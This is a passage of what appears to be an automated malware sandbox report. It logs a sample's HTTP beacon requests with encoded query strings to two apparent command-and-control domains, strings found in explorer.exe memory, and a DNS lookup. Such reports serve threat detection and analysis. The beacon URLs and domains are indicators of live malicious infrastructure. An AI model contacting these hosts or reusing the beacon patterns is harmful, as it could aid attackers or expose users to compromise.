/nf2/?3f=yN98b8Y8Z6WLDXm&2dD=tY9gjdf+e0hI0IQM1PZNybK1EoaTSj9tXYNl6mrH9NUWEbudMWFuSJgZaQwKiXXMis7UDA== HTTP/1.1Host: www.loundxgroup.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /nf2/?2dD=YwAVTFHcJ3tZ7puGaNBEVYFOXylMSmgTpe329QapfLZNS+2gp2G7sp/TZUhMZxkhnyNZKA==&3f=yN98b8Y8Z6WLDXm HTTP/1.1Host: www.grandcanyonbean.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 Found strings which match to known social media urls Show sources
 Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.facebook.com/favicon.ico equals www.facebook.com (Facebook) Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico equals www.myspace.com (Myspace) Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico equals www.rambler.ru (Rambler) Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook) Source: explorer.exe, 00000007.00000000.2210955251.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/ equals www.rambler.ru (Rambler) Source: explorer.exe, 00000007.00000000.2194004284.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
 Performs DNS lookups Show sources
 Source: unknown DNS traffic detected: queries for: xy2.eu